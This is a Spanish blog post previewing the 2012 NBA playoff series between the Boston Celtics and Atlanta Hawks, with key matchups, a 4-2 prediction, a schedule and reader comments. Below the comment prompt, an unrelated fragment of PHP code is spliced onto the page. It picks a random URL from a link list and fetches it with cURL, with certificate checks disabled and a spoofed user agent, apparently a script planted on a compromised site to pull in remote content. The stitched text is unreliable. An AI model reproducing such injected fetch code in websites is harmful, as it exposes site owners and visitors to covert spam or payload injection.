Análisis: Boston Celtics (4) vs Atlanta Hawks (5)

29 de April de 2012 por Sancho88

Regular: 2-1

Celtics: 91.9 PF – 89.3 PC
Hawks: 96.6 PF – 93.2 PC

La filtración hace pocos días en Yahoo Sports de los movimientos autodestructivos que se cocinaron en el despacho de Danny Ainge en las últimas horas del ‘trade deadline’, y que situaron durante 20 minutos a Ray Allen en los Grizzlies a cambio de O.J. Mayo, no ha descentrado para nada a los ‘perros viejos’ de la liga, que han firmado una temporada sensacional y ahora deben ponerle la guinda. ¿Qué se les puede exigir a los Celtics? Al menos, pasar de primera ronda. Tal y como llegan a la cita de postemporada Bulls y Heat, pocos pueden soñar con repetir el título de 2008 en estos locos dos meses de Playoffs que se avecinan, pero estamos hablando del ‘Orgullo Verde’, y eso siempre es suficiente para no subestimarlos. El ‘background’ de la filmoteca hollywoodiense nos ha enseñado sabias lecciones a lo largo de la historia. Una de ellas, que se repite muy a menudo para el deleite de los seguidores de las películas de carceleros y de malotes -bautizadas como ‘Super Wakas’ por Carlos Herrera-, es que el último día de servicio antes de la jubilación es posible que caiga un asteroide sobre la tierra y que tú seas el responsable de salvar a la humanidad, que te encierren en una prisión y pases una deliciosa madrugada siendo tiroteado desde fuera por policías corruptos, mientras tienes que compincharte a la fuerza con un mafioso perseguido por la justicia, e incluso, que un psicópata asesino en serie que monta en bicicleta decida encerrarte con una cinta de casete en un cuchitril. Por tanto, quién sabe las aventuras que les depararán a Pierce, Garnett y Allen en su previsiblemente última reunión juntos en pos del trofeo Larry O’Brien. Si hubiera que ponerle un título al ‘taquillazo’, sería algo así como ‘El epílogo del Big Three original’. Los epílogos siempre fueron imprevisibles…

De entrada, se presenta una eliminatoria con morbo entre el campeón de la División Atlántico, Boston Celtics, y el segundo de la División Sureste, Atlanta Hawks. A pesar de que los Hawks han sumado una victoria más que los Celtics (40-26 por 39-27), aparecen 5º en la clasificación, pero su mejor parcial les otorga la ventaja de campo en estos cuartos de final. En la temporada del último anillo para los verdes (2007-2008), los Hawks estuvieron a punto de aguarles la fiesta forzando el séptimo partido en primera ronda. Fue un gran toque de atención entonces, pues los ‘Halcones’ apenas habían conseguido 37 victorias en toda la temporada y los Celtics parecían imbatibles. Y este año también coincidirán, aunque en el ocaso de la carrera de aquellos campeones. Los dos equipos llegan a la eliminatoria con grandes sensaciones, pues han terminado la temporada regular completando un mes de abril maravilloso en ambos casos. Boston ha sumado 10 victorias y 5 derrotas; Atlanta aún mejor (9-3).

Claves de la eliminatoria

– Dos tipos muy enchufados: Atlanta Hawks llega en un momento dulce, con sus dos máximos estiletes en plena forma ante la ausencia de Al Horford, del que no se espera su participación en la eliminatoria según ESPN, pues aún no se ha recuperado de su rotura del músculo pectoral izquierdo. Joe Johnson y Josh Smith se han ido turnando durante toda la temporada para decidir los partidos en los momentos calientes. Ninguno de los dos tiembla en el ‘clutch time’. Es destacable la cantidad de tiros ganadores del ‘sobrepagado’, a la vez que odiado por sus excesivas apariciones en el All-Star, e injustamente ajusticiado a latigazos como Kunta Kinte en esta página: JoJo. Desde luego, esta vez debemos rendirnos a la evidencia, y es que sin él los Hawks habrían ganado muchos menos partidos. Por otra parte, desde que la NBA decidió unilateralmente que Josh Smith no merecía ser All-Star (en detrimento del propio Johnson), el alero de Georgia se ha ‘picado’ consigo mismo y con todos los que dudaban de su compromiso con el equipo -tampoco vamos a criminalizar a sus detractores, ya que él mismo no para de criticar la falta de ambición de su franquicia- y ha firmado una campaña espectacular, con los mejores números desde que llegó a la liga hace 8 temporadas. No obstante, sus grandes promedios (19-10-4), deben pelear contra su instinto de ‘killer’ desde el 7,25. Simplemente, es superior a sus fuerzas no tirarse sus 3 o 4 castañas pilongas por partido, con una de las mecánicas más ridículas de la competición, en dura pugna con las de Marion o Bonner. Ante esto, Celtics aplicará su dura defensa perimetral y al poste para intentar anular los casi 20 puntos de media de cada una de las dos Jotas de los Hawks. Allen y Bass tendrán trabajo asegurado.

– Rondo es el hombre: Rajon Rondo ha dejado perlas para el recuerdo esta temporada. Su 18-17-20 contra los Knicks hace 3 semanas demuestra que estamos ante un jugador hecho de otra pasta. También lo demuestran sus 6 ‘triple dobles’ en una temporada de vértigo, con numerosas lesiones para él, rumores de traspaso, etc. A pesar de eso, ha jugado más de 35 partidos por encima de las 10 asistencias, y está a solo 5 partidos de igualar un record histórico: los 29 partidos consecutivos de John Stockton sumando más de 10 asistencias. No obstante, aún está lejos del record absoluto de Magic Johnson, que llegó hasta los 44 juegos consecutivos sumando más de 10 asistencias. Por tanto, este dato será un reto importante para el base de los Celtics, que repartirá muchas canastas entre sus compañeros con total seguridad. Ni qué decir tiene que el pobre Teague será -y nunca mejor dicho debido al número de su camiseta- un cero a la izquierda en esta eliminatoria. Teóricamente Rondo se lo debe de merendar con patatas. Ahí crecerán mucho los Celtics.

– ¿Decidirá el factor cancha? Hasta el final se lo han jugado, y las cartas han sido favorables para los Hawks finalmente. Boston tendrá que defenderse jugando como máximo 3 partidos en el Garden, en su imperio, en su cuna. Fuera de allí son un equipo batible y los Hawks lo saben, y pueden aprovecharse de ello. Veremos hasta dónde llega la mentalidad ganadora de Smith, y si de verdad cree en las posibilidades de sus compañeros. Si no es así, la teórica ventaja del factor cancha se volverá en su contra, y muy probablemente veamos a los Celtics asaltando el Phillips Arena y llevándose los televisores, las radios, los transistores y todos los ‘cachibaches’ tecnológicos que se encuentren a su paso. Será difícil que los Hawks den alguna sorpresa fuera. De esta manera, asegurar, cuidar, mimar y aprovechar el factor cancha será decisivo. Es la principal misión de los Hawks en la eliminatoria.

– El perímetro de los verdes. Una de las muy gratas sorpresas, noticias y esperanzas para el futuro de la ciudad de Boston se llama Avery Bradley. El ‘rookie’ está aprovechando a la perfección sus minutos en la cancha, y le vendrá de perlas a Doc Rivers para dar descansos a Rondo y Allen. Eso complica mucho la defensa perimetral de los Hawks. Hinrich es un buen defensor, pero Marvin Williams deja mucho que desear, y desde luego Ray Allen es superior a su par: Joe Johnson. El trío Bradley-Allen-Pierce dará mucha guerra a los ‘pequeños’ de los Hawks.

– ¿Alguien puede parar a ‘Big Ticket’? Aparentemente, no. Es la pesadilla de Larry Drew durante toda la temporada. Sin el dominicano Al Horford, hemos visto prácticamente de todo en los ‘Halcones’. Erick Dampier, Jason Collins o Ivan Johnson, además del georgiano Zaza Pachulia, han ido ocupando la plaza de ‘5’ durante la temporada, con adversa suerte en todos los casos. Pensar que Doc Rivers no castigará esa grave carencia es como pensar que Tracy McGrady renacerá de sus cenizas en esta eliminatoria anotando 25 puntos por partido. Es decir, imposible. Kevin Garnett debe destrozar en la pintura a los Hawks, y Rondo será su cómplice. A priori, entre los dos se pueden poner las botas.

– Defensa céltica. Por último, y como envoltorio especial del resto de claves donde Celtics son superiores, se debe imponer la defensa numantina planteada por Doc Rivers. Es tarea complicada meterles más de 90 puntos en cualquier partido, y la cosa se complicará más con el modo ‘Playoffs’ activado. Hawks sufrirán incluso para superar los 80 puntos. Teague intentará imprimir un ritmo alto gracias a su velocidad, pero es improbable que lo consiga. Será una eliminatoria lenta sí o sí. Y ahí ‘The Truth’ es el hombre más feliz del mundo.

Pronóstico

4-2 Boston Celtics

Calendario (hora española)

Partido 1 – Lunes 30 de abril en Atlanta (01h00)
Partido 2 – Miércoles 2 de mayo en Atlanta (01h30)
Partido 3 – Sábado 5 de mayo en Boston (01h30)
Partido 4 – Lunes 7 de mayo en Boston (01h00)
Partido 5 – Miércoles 9 de mayo en Atlanta
Partido 6 – Viernes 11 de mayo en Boston
Partido 7 – Domingo 13 de mayo en Atlanta

Comenta

12 comentarios a esta entrada

  1. melo15 dice:
    #1

    Vaya pedazo de eliminatoria, di Horfors vuelve los Hawks tienen opciones, pero si no…lo veo dificil, ademas todos sabemos como se las gastan Garnett, Pierce y Allen en playoffs. Teague va a tener que demostrar que puede ser titular en la NBA, para mi es la clave de la eliminatoria, si consigue imprimirle un poco mas de velocidad los Hawks tienen mucho ganado, porque no veo al Big Three corriendo detras de Teague y Smith.

      Citar

  2. JoeJohnson dice:
    #2

    sublimes articulos,como siempre.
    Ultima oportunidad tambien de los Hawks de llegar,minimo, a las finales de conferencia,con los peores C´s del lustro y unos bulls debilitados sin la bestia negra de los halcones en su camino,veo a los Hawks como rivales de Miami en las finales.

      Citar

  3. infante dice:
    #3

    Yo creo que Bonner no tira tan mal, meteria a gente como Childress antes que el…

      Citar

  4. MagicJohnson32 dice:
    #4

    El estado físico de Ray Allen es fundamental. Los C’s lo necesitan para la defensa sobre JoJo, porque Bradley es un excelente defensor pero mucho más pequeño e incapaz de frenarlo cuando se vaya al poste.

    No me extrañaría ver bastantes minutos un duelo de pseudo-Centers Josh Smith vs Kevin Garnett.

    También veo un 4-2 para Boston, aunque creo que veremos mucha igualdad.

      Citar

  5. rumbero dice:
    #5

    El delirio hollywodiense es súblime.Crack Sancho
    Yo barreré para casa. Me da que ni la ventaja de campo para los Hawks les va a dar ese plus en la eliminatoria. Creo que desde el año del anillo que Pierce y sobretodo Garnett no llegaban tan bien a PO. Luego está Rondo…y la defensa de Rivers. Muchos factores para pensar que con la baja de Horford, si Jojo y Smith no estan superlativos toda la eliminatoria, lo van a tener realmente complicado.

    PD: Igual me estoy flipando demasiado y el meteorito acaba aplastando al ‘El epílogo del Big Three original’

      Citar

  6. Nacho dice:
    #6

    Sueño con unos viejos que lleguen descansados para cerrar la bocaza de LeBron.
    Es verdad, pues: reprimamos
    esta fiera condición,
    esta furia, esta ambición,
    por si alguna vez soñamos.
    Y sí haremos, pues estamos
    en mundo tan singular,
    que el vivir sólo es soñar;
    y la experiencia me enseña,
    que el hombre que vive, sueña
    lo que es, hasta despertar.

      Citar

  7. Sancho88 dice:
    #7

    …Y los viejos, viejos son… jejeje. Grande Nacho!!

      Citar

  8. MagicJohnson32 dice:
    #8

    Nacho:
    Sueño con unos viejos que lleguen descansados para cerrar la bocaza de LeBron.
    Es verdad, pues: reprimamos
    esta fiera condición,
    esta furia, esta ambición,
    por si alguna vez soñamos.
    Y sí haremos, pues estamos
    en mundo tan singular,
    que el vivir sólo es soñar;
    y la experiencia me enseña,
    que el hombre que vive, sueña
    lo que es, hasta despertar.

    ¡¡A sus pies!!

      Citar

  9. melo15 dice:
    #9

    Joder te pareces a Garcilaso de la Vega uno de esos poetas que estudio en historia de la lengua. Que clase!

      Citar

  10. Sancho88 dice:
    #10

    melo15:
    Joder te pareces a Garcilaso de la Vega uno de esos poetas que estudio en historia de la lengua. Que clase!

    jajaj, melo, vuela hasta el siglo de oro, ahí lo encontrarás…(S.XVII) pero de todas formas, muy bien traído Nacho, elevando el nivel cultural de este blog, en el que algunas veces nos ponemos algo cavernícolas, sobre todo al nombrar la palabra Jameer Nelson, Joe Johnson, Derek Fisher… jejeje

      Citar

  11. Lucho dice:
    #11

    Veo eliminatoria muy larga. 7º partido para los Celtics

      Citar

  12. Nacho dice:
    #12

    melo15:
    Joder te pareces a Garcilaso de la Vega uno de esos poetas que estudio en historia de la lengua. Que clase!

    Es de las fáciles. La vida es sueño, de Calderón de la Barca. Igual te cuesta entrar en el lenguaje, pero merece la pena.
    Y eso que yo soy más de Lope.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>